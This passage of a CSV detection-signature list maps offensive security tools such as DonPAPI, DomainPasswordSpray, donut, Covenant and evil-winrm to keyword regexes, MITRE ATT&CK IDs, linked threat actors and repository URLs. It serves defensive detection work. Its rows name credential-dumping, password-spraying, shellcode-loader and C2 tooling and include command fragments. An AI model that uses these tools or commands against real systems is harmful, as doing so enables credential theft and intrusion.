- T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","41371" "*domain_analyzer-master*",".{0,1000}domain_analyzer\-master.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","41372" 
"*domain_hunter-v*.jar",".{0,1000}domain_hunter\-v.{0,1000}\.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","41373" "*domainDumpConfig*",".{0,1000}domainDumpConfig.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","41374" "*DomainEnumerator*",".{0,1000}DomainEnumerator.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","41375" "*domainhunter*",".{0,1000}domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. 
It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","41376" "*domainhunter.py*",".{0,1000}domainhunter\.py.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","41377" "*Domaininfo/Domaininfo.py*",".{0,1000}Domaininfo\/Domaininfo\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","41378" "*Domainpassspray*",".{0,1000}Domainpassspray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41379" "*DomainPasswordSpray*",".{0,1000}DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to 
perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","N/A","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","41380" "*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","41381" "*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","41382" "*DomainPasswordSpray.psm1*",".{0,1000}DomainPasswordSpray\.psm1.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","41383" "*DomainRecon*ridbrute*",".{0,1000}DomainRecon.{0,1000}ridbrute.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - 
TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41384" "*DomainRecon/ADCS*",".{0,1000}DomainRecon\/ADCS.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41385" "*DomainRecon/BloodHound*",".{0,1000}DomainRecon\/BloodHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41386" "*DomainRecon/SilentHound*",".{0,1000}DomainRecon\/SilentHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41387" "*DomainRecon\ADCSServer.txt*",".{0,1000}DomainRecon\\ADCSServer\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41388" "*DomainRecon\DC-IPs.txt*",".{0,1000}DomainRecon\\DC\-IPs\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41389" "*DomainRecon\ExploitableSystems.txt*",".{0,1000}DomainRecon\\ExploitableSystems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41390" "*DomainRecon\OxidBindings.txt*",".{0,1000}DomainRecon\\OxidBindings\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41391" "*DomainRecon\Windows_Servers.txt*",".{0,1000}DomainRecon\\Windows_Servers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41392" 
"*DomainTrustDiscovery_PowerView.py*",".{0,1000}DomainTrustDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41393" "*domcachedump.py*",".{0,1000}domcachedump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41394" "*domcachedumplive.py*",".{0,1000}domcachedumplive\.py.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","41395" "*dome.py *",".{0,1000}dome\.py\s.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","41396" "*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - 
TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","41397" "*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","41398" "*dominik@dominikschuermann.de*",".{0,1000}dominik\@dominikschuermann\.de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41399" "*donapapi -pvk *",".{0,1000}donapapi\s\-pvk\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41400" "*Done dumping SAM hashes for host: *",".{0,1000}Done\sdumping\sSAM\shashes\sfor\shost\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41404" "*Done! 
Check for existing lsass.dmp file into current folder*",".{0,1000}Done!\sCheck\sfor\sexisting\slsass\.dmp\sfile\sinto\scurrent\sfolder.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","41405" "*DoNotUseThisPassword123!*",".{0,1000}DoNotUseThisPassword123!.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","41406" "*DonPAPI ""$DOMAIN""/*",".{0,1000}DonPAPI\s\""\$DOMAIN\""\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41407" "*donpapi -credz *",".{0,1000}donpapi\s\-credz\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41408" "*donpapi.lazagne.softwares*",".{0,1000}donpapi\.lazagne\.softwares.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41409" "*donpapi.myseatbelt'*",".{0,1000}donpapi\.myseatbelt\'.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41410" "*DonPAPI.py *",".{0,1000}DonPAPI\.py\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41411" "*donpapi_dump*",".{0,1000}donpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41412" "*donpapi-master.zip*",".{0,1000}donpapi\-master\.zip.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41413" "*Don't be evil with this. 
I created this tool to learn*",".{0,1000}Don\'t\sbe\sevil\swith\sthis\.\sI\screated\sthis\stool\sto\slearn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","41414" "*Don't go to the police or the FBI for help. They won't help you*",".{0,1000}Don\'t\sgo\sto\sthe\spolice\sor\sthe\sFBI\sfor\shelp\.\sThey\swon\'t\shelp\syou.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","41415" "*DON'T RUN THIS IN YOUR WEB ROOT AS IT WILL OUTPUT ACCESS TOKENS*",".{0,1000}DON\'T\sRUN\sTHIS\sIN\sYOUR\sWEB\sROOT\sAS\sIT\sWILL\sOUTPUT\sACCESS\sTOKENS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","41416" "*Don't use your cat's name as a password!*",".{0,1000}Don\'t\suse\syour\scat\'s\sname\sas\sa\spassword!.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","41417" 
"*Don't_blindly_trust_obfuscated_code_it_might_do_something_bad*",".{0,1000}Don\'t_blindly_trust_obfuscated_code_it_might_do_something_bad.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","41418" "*donut -f *.dll -c * -m RunProcess*",".{0,1000}donut\s\-f\s.{0,1000}\.dll\s\-c\s.{0,1000}\s\-m\sRunProcess.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","41419" "*donut -f c2.dll*",".{0,1000}donut\s\-f\sc2\.dll.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","41420" "*donut* \DemoCreateProcess.dll *",".{0,1000}donut.{0,1000}\s\\DemoCreateProcess\.dll\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41421" "*donut.exe *.exe*",".{0,1000}donut\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41422" "*DONUT_BYPASS_CONTINUE*",".{0,1000}DONUT_BYPASS_CONTINUE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41423" "*donut-loader -*",".{0,1000}donut\-loader\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41424" "*Donut-Loader -process_id*",".{0,1000}Donut\-Loader\s\-process_id.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41425" "*DonutLoader(*",".{0,1000}DonutLoader\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41426" "*DonutLoader.cs*",".{0,1000}DonutLoader\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","41427" "*donut-maker.py -*",".{0,1000}donut\-maker\.py\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41428" "*donut-maker.py -i *.exe*",".{0,1000}donut\-maker\.py\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41429" "*donut-payload.*",".{0,1000}donut\-payload\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41430" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41431" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
